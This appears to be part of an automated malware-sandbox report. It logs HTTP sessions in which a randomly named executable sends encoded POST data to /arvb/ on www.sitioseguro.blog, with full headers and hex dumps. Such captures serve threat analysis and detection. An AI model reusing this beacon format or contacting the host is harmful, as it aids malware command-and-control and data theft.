                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 47 52 35 34 79 48 5a 38 3d 34 4a 32 5a 75 63 53 30 67 6d 48 76 65 43 4c 54 75 6d 53 74 77 68 45 6f 68 53 67 7a 50 50 4a 34 57 37 43 78 31 62 76 50 63 6b 4d 45 62 6a 73 4c 51 79 6e 32 6d 6e 72 77 4e 37 58 67 75 59 6b 30 4b 66 59 52 4e 6b 4a 6d 70 42 66 71 62 66 7a 50 70 44 62 43 59 47 6b 4c 51 64 6e 78 57 4c 4e 4e 52 4a 52 72 53 44 6e 5a 2b 34 76 77 36 73 65 52 42 73 59 57 67 78 49 35 31 6c 53 32 53 62 66 6e 54 76 78 47 4e 2b 59 3d 26 39 78 6e 3d 66 48 61 64 4e 70 6b 38 4d 56 61 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?GR54yHZ8=4J2ZucS0gmHveCLTumStwhEohSgzPPJ4W7Cx1bvPckMEbjsLQyn2mnrwN7XguYk0KfYRNkJmpBfqbfzPpDbCYGkLQdnxWLNNRJRrSDnZ+4vw6seRBsYWgxI51lS2SbfnTvxGN+Y=&9xn=fHadNpk8MVax"}</script></head></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  49192.168.2.650039172.67.162.39803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:34:47.619359970 CET822OUTPOST /arvb/ HTTP/1.1
                                                                                  Host: www.sitioseguro.blog
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 213
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.sitioseguro.blog
                                                                                  Referer: http://www.sitioseguro.blog/arvb/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 55 44 34 77 70 47 50 4f 65 4f 4b 4c 50 36 34 74 45 78 71 61 54 30 54 7a 69 36 38 4d 2b 64 57 63 58 65 5a 72 31 74 4b 34 33 31 68 6d 4a 74 61 78 47 6d 6a 63 4e 38 75 6d 6c 66 42 37 30 2f 78 77 4a 58 49 57 35 6d 36 70 6a 79 68 33 73 53 6b 48 51 5a 41 57 71 4e 46 4f 61 4d 71 4b 72 77 59 65 50 6c 75 73 70 78 4a 53 32 6e 4d 72 46 42 70 45 72 6e 7a 6c 43 73 6c 35 78 32 77 42 78 42 57 43 52 62 44 35 68 75 77 47 63 57 47 74 34 74 71 44 6e 70 6b 39 59 49 55 59 51 55 72 58 78 67 6f 37 62 69 51 7a 44 6f 79 72 6f 6a 57 61 48 35 64 34 71 5a 76 75 4f 45 33 58 76 48 73 4c 47 56 76 61 62 73 79 35 74 41 2f 4a 31 50 32 5a
                                                                                  Data Ascii: GR54yHZ8=UD4wpGPOeOKLP64tExqaT0Tzi68M+dWcXeZr1tK431hmJtaxGmjcN8umlfB70/xwJXIW5m6pjyh3sSkHQZAWqNFOaMqKrwYePluspxJS2nMrFBpErnzlCsl5x2wBxBWCRbD5huwGcWGt4tqDnpk9YIUYQUrXxgo7biQzDoyrojWaH5d4qZvuOE3XvHsLGVvabsy5tA/J1P2Z
                                                                                  Nov 20, 2024 08:34:48.132668018 CET1236INHTTP/1.1 405 Not Allowed
                                                                                  Date: Wed, 20 Nov 2024 07:34:48 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mDguE102mRMaAUZbJiD2y9jJIfLAcnGhF0AB6BxL%2FNvnD7SLNEjmLk38XlTqsdMD3LQD4v%2FgpogAiSvlA9dzQbLH5ByMKX6ZFpOgvGVN9rWAXxq4jxt8%2BxgTErRWUZedr9ow9UskXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56c27608077c6a-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2049&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=822&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                  Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly
                                                                                  Nov 20, 2024 08:34:48.132721901 CET90INData Raw: 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d
                                                                                  Data Ascii: error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  50192.168.2.650040172.67.162.39803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:34:50.204757929 CET846OUTPOST /arvb/ HTTP/1.1
                                                                                  Host: www.sitioseguro.blog
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 237
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.sitioseguro.blog
                                                                                  Referer: http://www.sitioseguro.blog/arvb/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 55 44 34 77 70 47 50 4f 65 4f 4b 4c 4f 66 6f 74 47 51 71 61 56 55 54 73 74 61 38 4d 6b 74 57 59 58 65 46 72 31 6f 7a 39 33 6e 56 6d 4a 50 79 78 48 6a 50 63 4d 38 75 6d 74 2f 42 36 37 66 78 76 4a 57 30 67 35 6b 2b 70 6a 79 31 33 73 51 4d 48 51 75 73 52 72 64 45 6f 54 73 71 45 6b 51 59 65 50 6c 75 73 70 78 63 33 32 6e 30 72 46 78 35 45 72 46 62 71 42 73 6c 36 6d 47 77 42 6e 78 57 47 52 62 44 62 68 73 46 6a 63 51 4b 74 34 70 75 44 6e 59 6b 2b 53 49 55 61 66 30 71 61 34 51 35 2b 58 67 56 78 4a 65 65 55 6f 69 47 35 50 76 41 69 32 71 76 4e 63 55 58 56 76 46 30 35 47 31 76 77 5a 73 4b 35 2f 58 7a 75 36 37 54 36 6b 31 50 69 4f 4f 6d 58 43 4a 41 57 57 47 34 34 4e 33 55 32 46 41 3d 3d
                                                                                  Data Ascii: GR54yHZ8=UD4wpGPOeOKLOfotGQqaVUTsta8MktWYXeFr1oz93nVmJPyxHjPcM8umt/B67fxvJW0g5k+pjy13sQMHQusRrdEoTsqEkQYePluspxc32n0rFx5ErFbqBsl6mGwBnxWGRbDbhsFjcQKt4puDnYk+SIUaf0qa4Q5+XgVxJeeUoiG5PvAi2qvNcUXVvF05G1vwZsK5/Xzu67T6k1PiOOmXCJAWWG44N3U2FA==
                                                                                  Nov 20, 2024 08:34:50.722913027 CET1236INHTTP/1.1 405 Not Allowed
                                                                                  Date: Wed, 20 Nov 2024 07:34:50 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P07bnp%2BSyO9vb0erM0IpuqnUhwDShPVOuJ8koO%2FXvM2DOLYmvcXMPosuNCFzfKLuSOBjTuO5dTmwoY%2Ft1VxJFMHgAC%2BFY45E%2BOnH4K4gHYzmcwaw10zdIco7m5%2F3fqNerdLTHT0pYg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56c2862eed5e5f-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1550&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=846&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                  Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome fri
                                                                                  Nov 20, 2024 08:34:50.722997904 CET96INData Raw: 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67
                                                                                  Data Ascii: endly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  51192.168.2.650041172.67.162.39803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:34:52.758469105 CET1859OUTPOST /arvb/ HTTP/1.1
                                                                                  Host: www.sitioseguro.blog
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 1249
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.sitioseguro.blog
                                                                                  Referer: http://www.sitioseguro.blog/arvb/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 55 44 34 77 70 47 50 4f 65 4f 4b 4c 4f 66 6f 74 47 51 71 61 56 55 54 73 74 61 38 4d 6b 74 57 59 58 65 46 72 31 6f 7a 39 33 6e 4e 6d 49 2b 53 78 47 41 58 63 50 38 75 6d 6e 66 42 33 37 66 77 31 4a 58 63 38 35 6b 69 54 6a 77 4e 33 32 7a 30 48 53 61 34 52 6c 74 45 6f 4d 38 71 46 72 77 59 78 50 68 79 77 70 78 4d 33 32 6e 30 72 46 33 56 45 74 58 7a 71 48 73 6c 35 78 32 77 4e 78 42 57 69 52 66 75 73 68 76 70 5a 63 67 71 74 34 4a 2b 44 30 36 63 2b 65 49 55 63 65 30 72 4a 34 51 31 31 58 68 35 4c 4a 61 57 36 6f 67 61 35 4d 59 5a 39 72 70 66 6b 4a 57 54 61 77 43 55 6e 4a 42 76 42 57 36 32 65 2b 45 54 49 33 70 62 74 73 43 44 30 45 4e 62 49 49 72 6c 2f 5a 68 52 51 44 55 46 43 66 36 38 71 4a 35 46 33 74 72 49 4f 35 30 6a 6d 64 41 67 76 42 53 59 30 42 30 38 41 6d 43 58 48 6b 74 43 57 4e 4b 79 35 43 51 79 33 59 59 32 77 48 77 44 62 4f 4b 68 58 75 51 36 5a 6b 52 2f 48 43 62 70 76 68 2f 2f 7a 6c 4a 4c 78 34 77 6f 50 32 34 2b 70 77 59 6c 66 4f 6b 71 75 42 67 52 43 62 63 41 4b 77 39 62 63 63 [TRUNCATED]
                                                                                  Data Ascii: GR54yHZ8=UD4wpGPOeOKLOfotGQqaVUTsta8MktWYXeFr1oz93nNmI+SxGAXcP8umnfB37fw1JXc85kiTjwN32z0HSa4RltEoM8qFrwYxPhywpxM32n0rF3VEtXzqHsl5x2wNxBWiRfushvpZcgqt4J+D06c+eIUce0rJ4Q11Xh5LJaW6oga5MYZ9rpfkJWTawCUnJBvBW62e+ETI3pbtsCD0ENbIIrl/ZhRQDUFCf68qJ5F3trIO50jmdAgvBSY0B08AmCXHktCWNKy5CQy3YY2wHwDbOKhXuQ6ZkR/HCbpvh//zlJLx4woP24+pwYlfOkquBgRCbcAKw9bccu2eB9jSkpfqiTqdlLUBgZIMf65Rw/1oYRYLCxgJAgecBVMQfutpUtyItQHNexSDf7vZ90y7Wa6RCUVDO6PhyVKRGjvOv5zKmqsPrflxmLvsLcl2/64VKjNGFTmVlPq276lqzQFfdEH3sezYrZDC8Q8WuOwVITJLvdvd05+e2gxi1HJvNyqi0IP4y8GwKlo2gVYCKgRMZmv2PBPkwXvlqgSjXEALfyg9P0CCubcbqqd2MrxsEEy28ZUcqDBDNlJu/8fJJ0Dyj3rpn2EePHHUU25GXOFFCSE8VFjKyrBiwePdmepGubUy6G1elc5mQOHNizS6sfb1FxITNq/mD/8KT4PJJ0U6I1feo1C35QB+bV67IEWI1HO1BZSDWH+GoanOTphE6l/jV/g/78+GHGRBzMcszV7VdYOvNF0RrdB82wXCWxISy3ZTzkB3L8A83t26Qw7GKilwpgovja7QeVIjWCoVLARKDDNQhHbQZKxqySXEafx6QVPG3c+kDX8dlDUrijZlfCIWaTKdru7TcfOmcolqXXbi6xhemE2tWOsaeTAzqFN14s9GZGPZlL+voXm+C4ouB2Lu9h90Z/9dval9siz9LYJtpazvFX8LdUWhlSjBto89BKmYwNptCPEiu63ZNfYPbGrPKJf6CqzXadOACwvRYIQWWfLSDQ+ [TRUNCATED]
                                                                                  Nov 20, 2024 08:34:53.275191069 CET1236INHTTP/1.1 405 Not Allowed
                                                                                  Date: Wed, 20 Nov 2024 07:34:53 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FgGas7RfuTt8VXnl9rLo%2BkFAyMOauGoS026PjdFO2%2F5MSRNiE4mev%2FZr13WV9562hIaQ2I5LTCHpXR6PRbMnXrnd29npnGbcWgU7RhAIiIIHXydul3gjA6KoyXEJ2l7CASl2emP8hA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56c2961ae0423b-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1599&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1859&delivery_rate=0&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                  Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friend
                                                                                  Nov 20, 2024 08:34:53.275213003 CET93INData Raw: 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d
                                                                                  Data Ascii: ly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  52192.168.2.650043172.67.162.39803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:34:55.305727005 CET558OUTGET /arvb/?GR54yHZ8=ZBQQqxbud8SVIvMkbBf/fVH1me8478TvMeRY2MiH3kRRc/z7OAWaNoWdi819/s5bJQ0i5xulgwkm2DEXU68//topbf+A00Q8GVm5yCYkyRQ3ElhjsG3EX+N+jW0L22iONcil9J4=&9xn=fHadNpk8MVax HTTP/1.1
                                                                                  Host: www.sitioseguro.blog
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Nov 20, 2024 08:34:55.824734926 CET1236INHTTP/1.1 200 OK
                                                                                  Date: Wed, 20 Nov 2024 07:34:55 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                                                                  Accept-Ranges: bytes
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2IbFCCEqn4qLUSz%2BDdu3a33IFQl5F%2BHhPAVPGmv7haezXLt8rcMymv1DfiYOC6SHZrzAkRBfVw6Ok8WEvbRRvgxCVp4u24nOWcJkqIDs5bOH8uGdfJKpngvoymWve0O%2BkM2Bmode5g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e56c2a61fab4258-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2004&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=558&delivery_rate=0&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 32 64 61 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 [TRUNCATED]
                                                                                  Data Ascii: 2dae<!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::before,a,label{display:inline-block}.ma
                                                                                  Nov 20, 2024 08:34:55.824788094 CET1236INData Raw: 69 6e 2c 2e 77 72 61 70 70 65 72 7b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 2c 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 69 74 65 6d 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76
                                                                                  Data Ascii: in,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}*{padding:0;margin:0;border:0}*,::after,::before{box-sizing:border-box}body,html{height:100%;min-width:320px}body{color:#fff;line-height:1;font-family:Roboto;f
                                                                                  Nov 20, 2024 08:34:55.824821949 CET1236INData Raw: 70 3a 2d 32 34 30 70 78 3b 72 69 67 68 74 3a 2d 33 36 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 2d 31 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 20 2e 73 76 67 2d 74 77 6f 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 62 6f 74 74 6f 6d 3a 2d 32
                                                                                  Data Ascii: p:-240px;right:-360px;z-index:-1}.window-main .svg-two{position:absolute;bottom:-258px;left:-223px;z-index:-1}.window-main__title{text-align:center;padding-bottom:1.875rem;position:relative;font-weight:500;line-height:1.2777777778}.window-main
                                                                                  Nov 20, 2024 08:34:55.824857950 CET672INData Raw: 6d 61 69 6e 5f 5f 69 74 65 6d 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 2e 38 37 35 72 65 6d 7d 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 32 30 65 6d 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 3a 31 2e 35 72
                                                                                  Data Ascii: main__item{padding-left:.875rem}}@media (max-width:20em){.window-main{padding:1.5rem}.window-main__title{font-size:1.5rem}.window-main__body{margin-top:1.5rem;font-size:.875rem}.window-main__info{margin-bottom:1.5rem}.window-main__list{padding
